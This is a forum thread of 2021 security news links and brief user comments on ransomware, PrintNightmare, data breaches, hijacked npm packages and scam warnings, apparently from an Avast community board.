https://gizmodo.com/you-should-definitely-update-your-dell-computer-right-n-1846823763?scrolla=5eb6d68b7fedc32c19ef33b4
https://www.dell.com/support/kbdoc/sv-se/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability
-
US and Australia warn of escalating Avaddon ransomware attacks
https://www.bleepingcomputer.com/news/security/us-and-australia-warn-of-escalating-avaddon-ransomware-attacks/
-
https://youtu.be/y50kRNfiWko
-
https://youtu.be/-y119gKNtJE
-
WordPress 5.7.2 Security Release
https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/
-
Security News Roundup for the w/e 5/14/2021
https://youtu.be/EdtuZlJ2-Xk
-
Weekly Security News Roundup w/e 5-21-2021
https://youtu.be/jnFdl4tSeEc
-
Weekly Security News Roundup w/e 5-28-2021
https://youtu.be/L1Ep5o3upmc
-
Watch out: These unsubscribe emails only lead to further spam
https://www.bleepingcomputer.com/news/security/watch-out-these-unsubscribe-emails-only-lead-to-further-spam/
-
Watch out: These unsubscribe emails only lead to further spam
https://www.bleepingcomputer.com/news/security/watch-out-these-unsubscribe-emails-only-lead-to-further-spam/
Guess what, I have been wary about even using unsubscribe links in regular emails that have them. Frequently these links are by a company sending the emails and not the company that you initially subscribed to. Whilst the email might be legit, I always check out the unsubscribe link before using it. Or I put a block on that email address in MailWasher Pro (MWP), my anti-spam program, so I don't receive the emails, so there is no confirmation of receipt, i.e. a live email address.
As for unsolicited unsubscribe emails, they are treated like any other unsolicited emails (SPAM/Scam), deleted by MWP at server level, so they don't even get downloaded.
-
Critical 0-day in Fancy Product Designer Under Active Attack
https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/
-
Weekly Security News Roundup w/w 6-4-2021
https://youtu.be/EIZTAMMCE2c
-
We do not know what firms have come under attack via a Type Mismatch Bug,
a zero-day attack that urged Google to patch their browser JS engine.
The threat is inherent in using a browser monoculture (Google Chrome/Chromium)
inside another monoculture, i.e., Windows 10 (latest version).
It was Kaspersky's Boris Larin who reported this so-called PuzzleMaker attack.
Re: https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/
JS (JavaScript) will be the world's biggest can of code-worms ever for some time to come. :o
polonus
-
IPAS: Security Advisories for June 2021
https://blogs.intel.com/technology/2021/06/intel-security-advisories-for-june-2021/
-
Audi, Volkswagen data breach affects 3.3 million customers
https://www.bleepingcomputer.com/news/security/audi-volkswagen-data-breach-affects-33-million-customers/
-
Audi, Volkswagen data breach affects 3.3 million customers
https://www.bleepingcomputer.com/news/security/audi-volkswagen-data-breach-affects-33-million-customers/
https://youtu.be/MZViT8dxYJI
-
Weekly Security News Roundup w/e 6-11-2021
https://youtu.be/ic8FYwEyGUA
-
Weekly Security News Roundup w/e 6-18-2021
https://youtu.be/XOgjGNGg3qI
-
Scammer arrested for phishing operation, sent 25,000 texts in a day
https://www.bleepingcomputer.com/news/security/scammer-arrested-for-phishing-operation-sent-25-000-texts-in-a-day/
https://www.gmp.police.uk/news/greater-manchester/news/news/2021/june/man-arrested-in-manchester-hotel-after-over-25000-phishing-messages-sent-in-one-day/
-
Dell SupportAssist bugs put over 30 million PCs at risk
https://www.bleepingcomputer.com/news/security/dell-supportassist-bugs-put-over-30-million-pcs-at-risk/
-
Security News Roundup w/e 6-25-2021
https://youtu.be/L0twMUQrMbg
-
New LinkedIn Data Leak Leaves 700 Million Users Exposed
https://restoreprivacy.com/linkedin-data-leak-700-million-users/
-
Public Windows PrintNightmare 0-day exploit allows domain takeover
https://www.bleepingcomputer.com/news/security/public-windows-printnightmare-0-day-exploit-allows-domain-takeover/
-
Public Windows PrintNightmare 0-day exploit allows domain takeover
https://www.bleepingcomputer.com/news/security/public-windows-printnightmare-0-day-exploit-allows-domain-takeover/
Microsoft shares mitigations for Windows PrintNightmare zero-day bug
https://www.bleepingcomputer.com/news/security/microsoft-shares-mitigations-for-windows-printnightmare-zero-day-bug/
-
Security News Roundup w-e 7-2-2021
https://youtu.be/FwtgVMOEAzo
-
Public Windows PrintNightmare 0-day exploit allows domain takeover
https://www.bleepingcomputer.com/news/security/public-windows-printnightmare-0-day-exploit-allows-domain-takeover/
Microsoft shares mitigations for Windows PrintNightmare zero-day bug
https://www.bleepingcomputer.com/news/security/microsoft-shares-mitigations-for-windows-printnightmare-zero-day-bug/
Actively exploited PrintNightmare zero-day gets unofficial patch
https://www.bleepingcomputer.com/news/security/actively-exploited-printnightmare-zero-day-gets-unofficial-patch/
https://blog.0patch.com/2021/07/free-micropatches-for-printnightmare.html
-
REvil ransomware attacks systems using Kaseya’s remote IT management software
https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software
-
REvil ransomware attacks systems using Kaseya’s remote IT management software
https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software
Rapid Response: Mass MSP Ransomware Incident
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
-
REvil ransomware attacks systems using Kaseya’s remote IT management software
https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software
Rapid Response: Mass MSP Ransomware Incident
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://youtu.be/ov58LCpwg70
-
Apple is Improving Privacy Features, but Is It Enough?
https://youtu.be/fT6cksdmCQ4
A closer look at Apple's new privacy features.
-
REvil ransomware attacks systems using Kaseya’s remote IT management software
https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software
Rapid Response: Mass MSP Ransomware Incident
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://youtu.be/ov58LCpwg70
CISA, FBI share guidance for victims of Kaseya ransomware attack
https://www.bleepingcomputer.com/news/security/cisa-fbi-share-guidance-for-victims-of-kaseya-ransomware-attack/
-
Public Windows PrintNightmare 0-day exploit allows domain takeover
https://www.bleepingcomputer.com/news/security/public-windows-printnightmare-0-day-exploit-allows-domain-takeover/
Microsoft shares mitigations for Windows PrintNightmare zero-day bug
https://www.bleepingcomputer.com/news/security/microsoft-shares-mitigations-for-windows-printnightmare-zero-day-bug/
Actively exploited PrintNightmare zero-day gets unofficial patch
https://www.bleepingcomputer.com/news/security/actively-exploited-printnightmare-zero-day-gets-unofficial-patch/
https://blog.0patch.com/2021/07/free-micropatches-for-printnightmare.html
Microsoft pushes emergency update for Windows PrintNightmare zero-day
https://www.bleepingcomputer.com/news/security/microsoft-pushes-emergency-update-for-windows-printnightmare-zero-day/
-
Avast Security News Roundup w/e 7-9-2021
https://youtu.be/TRRMAZifXCE
-
REvil ransomware attacks systems using Kaseya’s remote IT management software
https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software
Rapid Response: Mass MSP Ransomware Incident
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://youtu.be/ov58LCpwg70
CISA, FBI share guidance for victims of Kaseya ransomware attack
https://www.bleepingcomputer.com/news/security/cisa-fbi-share-guidance-for-victims-of-kaseya-ransomware-attack/
Kaseya patches VSA vulnerabilities used in REvil ransomware attack
https://www.bleepingcomputer.com/news/security/kaseya-patches-vsa-vulnerabilities-used-in-revil-ransomware-attack/
-
Microsoft warns of critical PowerShell 7 code execution vulnerability
https://www.bleepingcomputer.com/news/security/microsoft-warns-of-critical-powershell-7-code-execution-vulnerability/
-
Windows print nightmare continues with malicious driver packages
https://www.bleepingcomputer.com/news/microsoft/windows-print-nightmare-continues-with-malicious-driver-packages/
https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-guidance-on-new-windows-print-spooler-vulnerability/
-
uMatrix has an unfixed vulnerability: here is a workaround
https://www.ghacks.net/2021/07/15/umatrix-has-an-unfixed-vulnerability-here-is-a-workaround/
-
uMatrix has an unfixed vulnerability: here is a workaround
https://www.ghacks.net/2021/07/15/umatrix-has-an-unfixed-vulnerability-here-is-a-workaround/
Why not simply use uBlock origin?
-
uMatrix has an unfixed vulnerability: here is a workaround
https://www.ghacks.net/2021/07/15/umatrix-has-an-unfixed-vulnerability-here-is-a-workaround/
Why not simply use uBlock origin?
I do use it, along with uMatrix, they aren't exactly the same.
-
7-16-2021 Weekly Security News Roundup
https://youtu.be/9ldLN55xo90
-
WordPress forces security update: https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/
This until cybercriminals have taken over the push request; then we will be in big trouble.
Too many low-grade consumer websites on this PHP-driven CMS i.m.h.o.
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
New Windows 10 vulnerability allows anyone to get admin privileges
https://www.bleepingcomputer.com/news/microsoft/new-windows-10-vulnerability-allows-anyone-to-get-admin-privileges/
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934
-
New Windows 10 vulnerability allows anyone to get admin privileges
https://www.bleepingcomputer.com/news/microsoft/new-windows-10-vulnerability-allows-anyone-to-get-admin-privileges/
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934
Since MS has already acknowledged the vulnerability, hopefully a patch will follow soon
for any systems affected.
Even without a patch, unless someone gains access to your system, this isn't really a problem. IMHO
-
CISA warns of stealthy malware found on hacked Pulse Secure devices
https://www.bleepingcomputer.com/news/security/cisa-warns-of-stealthy-malware-found-on-hacked-pulse-secure-devices/
https://us-cert.cisa.gov/ncas/current-activity/2021/07/21/malware-targeting-pulse-secure-devices
-
New Windows 10 vulnerability allows anyone to get admin privileges
https://www.bleepingcomputer.com/news/microsoft/new-windows-10-vulnerability-allows-anyone-to-get-admin-privileges/
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934
Since MS has already acknowledged the vulnerability, hopefully a patch will follow soon
for any systems affected.
Even without a patch, unless someone gains access to your system, this isn't really a problem. IMHO
Microsoft shares workaround for Windows 10 SeriousSAM vulnerability
https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-workaround-for-windows-10-serioussam-vulnerability/
-
Large chunks of the Internet went down due to a DNS issue at Akamai CDN today.
Re: https://www.engadget.com/playstation-network-down-161951186.html
The WEF has warned us we are in for more Internet downtime in the foreseeable future.
The Interwebz is under attack, folks, it is not only viruses, DDoS, ransomware.
This may affect us all. Better be forearmed by being forewarned.
(Also remember yesterday's interruptions of digital banking in the UK, three major UK banks had downtime).
polonus
-
REvil ransomware attacks systems using Kaseya’s remote IT management software
https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software
Rapid Response: Mass MSP Ransomware Incident
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://youtu.be/ov58LCpwg70
CISA, FBI share guidance for victims of Kaseya ransomware attack
https://www.bleepingcomputer.com/news/security/cisa-fbi-share-guidance-for-victims-of-kaseya-ransomware-attack/
Kaseya patches VSA vulnerabilities used in REvil ransomware attack
https://www.bleepingcomputer.com/news/security/kaseya-patches-vsa-vulnerabilities-used-in-revil-ransomware-attack/
Kaseya obtains universal decryptor for REvil ransomware victims
https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/
-
Emsisoft affirmed the decryption key is universal.
The REvil group now seems as vanished from this planet :)
Maybe a 'deal of sorts' was struck.
polonus
-
Weekly Security News Roundup w/e 7-23-2021
https://youtu.be/Xju8sx2fwrg
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Weekly Security News Roundup w/e 7-30-2021
https://youtu.be/fZOiVM3zkmI
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
New Windows PrintNightmare zero-days get free unofficial patch
https://www.bleepingcomputer.com/news/microsoft/new-windows-printnightmare-zero-days-get-free-unofficial-patch/
https://blog.0patch.com/2021/08/free-micropatches-for-malicious-printer.html
-
New Windows PrintNightmare zero-days get free unofficial patch
https://www.bleepingcomputer.com/news/microsoft/new-windows-printnightmare-zero-days-get-free-unofficial-patch/
https://blog.0patch.com/2021/08/free-micropatches-for-malicious-printer.html
I for one am not comfortable allowing a third-party patch which gives that third-party some insight into my systems.
I'll wait till an official patch is released from Microsoft that works without hindering the print process.
-
Weekly Security News Roundup w/e 8-6-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/06/11/26/crj1XOVj6eN/preview.jpg)
https://youtu.be/4fS5AoNxkW0
-
Cyber fraud now targeting professional channels
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/10/19/04/crj6qfVjYXu/preview.jpg)
https://youtu.be/SZLlz2MF0aQ
Attackers are creating elaborate schemes to steal information and money
through work email and business-related social media channels, like LinkedIn.
-
Hi bob3160,
Thanks for the heads-up. As always very informative.
Yep, cybercriminals are now also working from home, and this seems to be a growing trend, unfortunately.
Stay safe and secure with avast,
Damian a.k.a. polonus
-
Windows Print Spooler Remote Code Execution Vulnerability
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958
-
Windows Print Spooler Remote Code Execution Vulnerability
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958
Am I going absent-minded or what? I'm sure this has happened before, a very old Print Spooler exploit (MS eyes off the ball); I guess it is back to haunt us again.
-
Security News Roundup w/e 8-13-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/13/13/54/crjIILVjuya/preview.jpg)
https://youtu.be/bsdCgHRkyis
-
T-Mobile Investigating Claims of Massive Customer Data Breach
https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million
-
T-Mobile Investigating Claims of Massive Customer Data Breach
https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million
Another T-Mobile Breach
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/17/07/30/crjbivVjzL6/preview.jpg)
https://youtu.be/de5asTU65wY
-
T-Mobile Investigating Claims of Massive Customer Data Breach
https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million
Another T-Mobile Breach
https://youtu.be/de5asTU65wY
T‑Mobile Cybersecurity Incident Update
https://www.t-mobile.com/news/network/cybersecurity-incident-update-august-2021
-
T-Mobile Investigating Claims of Massive Customer Data Breach
https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million
Another T-Mobile Breach
https://youtu.be/de5asTU65wY
T‑Mobile Cybersecurity Incident Update
https://www.t-mobile.com/news/network/cybersecurity-incident-update-august-2021
T‑Mobile Shares Additional Information Regarding Ongoing Cyberattack Investigation
https://www.t-mobile.com/news/network/additional-information-regarding-2021-cyberattack-investigation
-
Security News Roundup for the w/e 8/20/2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/20/11/58/crjYX9VjHWW/preview.jpg)
https://youtu.be/GM2JeZdV3Y0
-
8-21-2021 Security News Flash
Another breach. This time it could affect 70 million AT&T customers.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/21/13/41/crjrIpVjKmd/preview.jpg)
https://youtu.be/1-gEAjyk3Z0
-
News Flash Update - T-Mobile Breach
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/21/21/21/crjrrrVj73l/preview.jpg)
https://youtu.be/8esXCJi26yc
Some sound advice you should follow if you're affected by the breach.
Many customers are.
-
LinkedIn - Job offers may be phishing scams.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/22/12/52/crj3lsVjsIv/preview.jpg)
https://youtu.be/D4CmeIJJZ7w
Be careful when you reply to a job offer on LinkedIn it may be a scam.
-
Home Title Fraud - What is it?
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/22/18/19/crj3FqVjsCX/preview.jpg)
https://youtu.be/ryt64OGP3nQ
It's your home but, is your name still on the deed?
-
Razer bug lets you become a Windows 10 admin by plugging in a mouse
https://www.bleepingcomputer.com/news/security/razer-bug-lets-you-become-a-windows-10-admin-by-plugging-in-a-mouse/
-
Razer bug lets you become a Windows 10 admin by plugging in a mouse
https://www.bleepingcomputer.com/news/security/razer-bug-lets-you-become-a-windows-10-admin-by-plugging-in-a-mouse/
I recently purchased and am using their mouse and keyboard on one of my systems.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/23/11/35/crj0XaVjL55/preview.jpg)
-
Weekly Security News Roundup w/e 8-27-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/27/13/48/crjtIJVQj2Q/preview.jpg)
https://youtu.be/CdhAxm3qJTk
-
T-Mobile Investigating Claims of Massive Customer Data Breach
https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million
Another T-Mobile Breach
https://youtu.be/de5asTU65wY
T‑Mobile Cybersecurity Incident Update
https://www.t-mobile.com/news/network/cybersecurity-incident-update-august-2021
T‑Mobile Shares Additional Information Regarding Ongoing Cyberattack Investigation
https://www.t-mobile.com/news/network/additional-information-regarding-2021-cyberattack-investigation
T-Mobile CEO: Hacker brute-forced his way through our network
https://www.bleepingcomputer.com/news/security/t-mobile-ceo-hacker-brute-forced-his-way-through-our-network/
-
What does Apple know about you?
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/28/15/04/crjuofVQ6Kk/preview.jpg)
https://youtu.be/sholahWkBlQ
In this world of data collection and processing, Apple takes the lead on privacy.
Thanks to Emma McGowan for her excellent article on this topic.
https://blog.avast.com/what-apple-knows-about-you-avast
-
Scammers who stole millions from elders indicted
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/29/19/03/crjUqeVQlEm/preview.jpg)
https://youtu.be/Hv-qAJ9D7SA
If you're interested in how I handled this scam when it was perpetrated on me
back in 2015, take a look at the following article.
https://blog.avast.com/2015/09/24/got-an-aging-parent-tell-them-about-the-grandparent-scam/
-
Weekly Security News Roundup w/e 9-3-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/03/13/01/crQeIVVQUWn/preview.jpg)
https://youtu.be/FEQ8yPfTCrI
-
9-3-2021 Breaking Security News Flash -
Beware: Hurricane Ida Scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/03/21/35/crQeraVQwaX/preview.jpg)
https://youtu.be/tVgxJ4yiHc0
-
Over 1 Million Sites Affected by Gutenberg Template Library & Redux Framework Vulnerabilities
https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/
-
Instagram Bans are now being sold as Crime-as-a-Service
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/07/18/03/crQiFeVQkH0/preview.jpg)
https://youtu.be/pWBjUIOzK5E
If you have an Instagram account, pay attention.
Thanks to David Strom for his article and the idea for this video.
https://blog.avast.com/author/david-strom
-
Hackers leak passwords for 500,000 Fortinet VPN accounts
https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/
-
Hackers leak passwords for 500,000 Fortinet VPN accounts
https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/
How the hell are companies NOT learning from the past about storing sensitive data encrypted and protected, etc., etc., until they get hacked :(
-
ProtonMail not so private after all
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/09/12/28/crQQluVQHIr/preview.jpg)
https://youtu.be/DcYzsxN6VV4
Even ProtonMail isn't totally private.
-
Avoid Social Media Quizzes
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/09/15/06/crQQo1VQHmQ/preview.jpg)
https://youtu.be/4nGjP78QmYc
These quizzes are designed for you to share personal information
usually with scammers.
-
Weekly Security News Roundup w/e 9-10-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/10/10/43/crQ665VQKAi/preview.jpg)
https://youtu.be/q0U8Uns-8yc
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
9-14-2021 Breaking Security News Flash - Apple Zero Day Vulnerability
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/14/12/59/crQ2lRV6c1K/preview.jpg)
https://youtu.be/fw-L3d4_U-k
A dangerous Apple zero-day vulnerability that needs to be patched ASAP.
-
New Windows security updates break network printing
https://www.bleepingcomputer.com/news/security/new-windows-security-updates-break-network-printing/
-
Weekly Security News Roundup w/e 9-17-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/17/13/56/crQbI8V6XG8/preview.jpg)
https://youtu.be/ugaCtJBpMI0
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
The dangers of Government use of biometric data.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/19/14/28/crQq2uV6oWI/preview.jpg)
https://youtu.be/XPf0wsVlsfs
Opt out of data collection of any type whenever and wherever possible.
Read the full article by Joe Bosso here,
https://blog.avast.com/government-use-of-biometric-data-avast
-
I have just phoned for technical support to be told there is NONE for at LEAST a MONTH !!!!!!!!!!!!!!!!!!!!!!!!
-
I have just phoned for technical support to be told there is NONE for at LEAST a MONTH !!!!!!!!!!!!!!!!!!!!!!!!
If you're looking for help, please start your own topic.
-
A list of vulnerabilities being abused by ransomware groups:
a. FBI's top 30: https://us-cert.cisa.gov/ncas/alerts/aa21-209a
b. NSA's top 25: https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/
It mostly concerns Microsoft-oriented enterprise products, next to QNAP, which is a consumer product,
while Hyper-V was not mentioned, as it was found to be vulnerable only recently (a fortnight ago).
polonus
-
Netgear fixes dangerous code execution bug in multiple routers
https://www.bleepingcomputer.com/news/security/netgear-fixes-dangerous-code-execution-bug-in-multiple-routers/
-
Weekly Security News Roundup w/e 9-24-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/24/20/27/crQZYtV6znw/preview.jpg)
https://youtu.be/P9omro7_HJE
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Hackers exploiting critical VMware vCenter CVE-2021-22005 bug
https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-vmware-vcenter-cve-2021-22005-bug/
-
Facebook Pauses Instagram For Kids
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/28/18/27/crQuFtV6mdY/preview.jpg)
https://youtu.be/5GB6MksWvLo
Thanks to Grace Macej for her excellent article.
https://blog.avast.com/author/grace-macej
-
FinFisher spyware uses (abuses) UEFI-Bootkit to infest computers.
Read: https://securelist.com/finspy-unseen-findings/104322/
and https://www.kaspersky.com/about/press-releases/2021_finfisher-spyware-improves-its-arsenal-with-four-levels-of-obfuscation-uefi-infection-and-more
This government spyware can repair the original MBR and Windows Boot Manager to leave no traces behind.
Finspy spyware has been used since 2011 by governments and government secret services.
polonus
-
The Epik data breach is political in nature — here's why you should care
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/09/29/14/28/crQU2uV6dLp/preview.jpg)
https://youtu.be/j7zRAMcQPac
When our freedom of speech is attacked, we should all care.
Thanks to Joe Bosso for his eye-opening article.
https://blog.avast.com/author/joe-bosso
-
Weekly Security News Roundup w/e 10-1-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/10/01/12/51/cr6Vl7V6Pb9/preview.jpg)
https://youtu.be/bPuOML2xAho
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
The Telegraph exposes 10 TB database with subscriber info
https://www.bleepingcomputer.com/news/security/the-telegraph-exposes-10-tb-database-with-subscriber-info/
-
Just today, I was going to check my bank account via "Bank Mode" on Avast! Secure Browser, but for some reason it said "my connection was not private" when I went to the website (Tompkins Trust Company, to be exact). As a precaution, I did a Network Scan with Avast! [Free Antivirus], but it says there were "no vulnerabilities found".
And just a few seconds ago, I checked it out once more (again through Bank Mode), but I was able to get to it no problem.
I honestly have no idea what this means, or if it's anything I should be worried about.
-
Hi CTWarmbrodt,
Sub-domain was hard to check: Test #1441921 - secure.tompkinstrust.com
2021-10-06 16:02 GMT+02:00, IPv4 and IPv6
Summary: All 4, Info 2, Notice 0, Warning 0, Error 0, Critical 0
Module / Level / Message:
SYSTEM / INFO: Using version v4.2.3 of the Zonemaster engine.
SYSTEM / CRITICAL: Not enough data about secure.tompkinstrust.com was found to be able to run tests.
BASIC: But SOA 'mname' nameserver (ns-1318.awsdns-36.org) is authoritative for 'tompkinstrust.com' zone.
polonus
-
Actively exploited Apache 0-day also allows remote code execution
https://www.bleepingcomputer.com/news/security/actively-exploited-apache-0-day-also-allows-remote-code-execution/
-
Massive Twitch hack: Source code and payment reports leaked
https://www.bleepingcomputer.com/news/security/massive-twitch-hack-source-code-and-payment-reports-leaked/
-
10/8/2021 Avast Security News Roundup
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/10/08/19/40/cr6jqkVXqzP/preview.jpg)
https://youtu.be/tPednH9D2Jw
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Stealing millions in Crypto Currency by using Copy and Paste
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/10/12/15/41/cr6lopVXUpJ/preview.jpg)
https://youtu.be/MOnr3FIuvx8
Not being careful with copy and paste in this instance, can be very costly.
Read the full article by Christopher Budd at:
https://blog.avast.com/author/christopher-budd
-
Phishing campaign uses math symbols to evade detection
https://www.bleepingcomputer.com/review/security/phishing-campaign-uses-math-symbols-to-evade-detection/
-
Verizon digital carrier Visible customer accounts were hacked
https://www.bleepingcomputer.com/news/security/verizon-digital-carrier-visible-customer-accounts-were-hacked/
-
Malicious Chrome ad blocker injects ads behind the scenes
https://www.bleepingcomputer.com/news/security/malicious-chrome-ad-blocker-injects-ads-behind-the-scenes/
-
Weekly Security News Roundup w/e 10-15-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/10/15/14/29/cr6o2UVXkZ9/preview.jpg)
https://youtu.be/aB-4cQlf_n8
-
Microsoft asks admins to patch PowerShell to fix WDAC bypass
https://www.bleepingcomputer.com/news/microsoft/microsoft-asks-admins-to-patch-powershell-to-fix-wdac-bypass/
-
FBI warns of fake govt sites used to steal financial, personal data
https://www.bleepingcomputer.com/news/security/fbi-warns-of-fake-govt-sites-used-to-steal-financial-personal-data/
-
Massive campaign uses YouTube to push password-stealing malware
https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/
-
Weekly Security News Roundup w/e 10-22-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/10/22/11/52/cr63XsVlcuh/preview.jpg)
https://youtu.be/hDKMhSRlTk4
-
Malware Discovered in Popular NPM Package, ua-parser-js
https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js
-
Report finds many ISPs use web browsing data and group consumers using sensitive characteristics such as race and sexual orientation
https://www.ftc.gov/news-events/press-releases/2021/10/ftc-staff-report-finds-many-internet-service-providers-collect
One thing one could do is make use of a VPN (Avast VPN);
another way, when MAC addresses are being collected, is to make use of
https://www.myshadow.org/resources/technitium-mac-address-changer?locale=en (free).
And remember, you do not have to worry about the info you do not share with the Interwebz.
polonus
-
Malware Discovered in Popular NPM Package, ua-parser-js
https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js
More here: https://www.bleepingcomputer.com/news/security/popular-npm-library-hijacked-to-install-password-stealers-miners/
-
Gamers beware: Malware and malicious cracked games pose risks
https://blog.avast.com/malicious-cracked-games-pose-risks-avast
-
Mozilla blocks malicious add-ons installed by 455K Firefox users
https://www.bleepingcomputer.com/news/security/mozilla-blocks-malicious-add-ons-installed-by-455k-firefox-users/
https://blog.mozilla.org/security/2021/10/25/securing-the-proxy-api-for-firefox-add-ons/
-
Critical site deletion vulnerability in WordPress CMS plug-in:
https://www.wordfence.com/blog/2021/10/site-deletion-vulnerability-in-hashthemes-plugin/
(e.g. HashThemes Demo Importer not updated to the latest version).
pol
-
All Windows versions impacted by new LPE zero-day vulnerability
https://www.bleepingcomputer.com/news/security/all-windows-versions-impacted-by-new-lpe-zero-day-vulnerability/
-
Weekly Security News Roundup w/e 10-29-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/10/29/15/03/cr6UoeVl045/preview.jpg)
https://youtu.be/OVTUJSYLTlk
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Microsoft: Windows KB5006674, KB5006670 updates break printing
https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-kb5006674-kb5006670-updates-break-printing/
-
Microsoft: Windows KB5006674, KB5006670 updates break printing
https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-kb5006674-kb5006670-updates-break-printing/
Bl00dy brilliant, MS breaks printing with a KB (or two in this case) yet again, from the past issues and KBs breaking printing. You would have thought/hoped they had learnt from these. Fortunately for me I don't do network printing, but direct connection.
-
Microsoft: Windows KB5006674, KB5006670 updates break printing
https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-kb5006674-kb5006670-updates-break-printing/
Bl00dy brilliant, MS breaks printing with a KB (or two in this case) yet again, from the past issues and KBs breaking printing. You would have thought/hoped they had learnt from these. Fortunately for me I don't do network printing, but direct connection.
The break must only be affecting certain printers or systems. No problem here with printing
via my Epson ET 2720.
-
Popular 'coa' NPM library hijacked to steal user passwords
https://www.bleepingcomputer.com/news/security/popular-coa-npm-library-hijacked-to-steal-user-passwords/
-
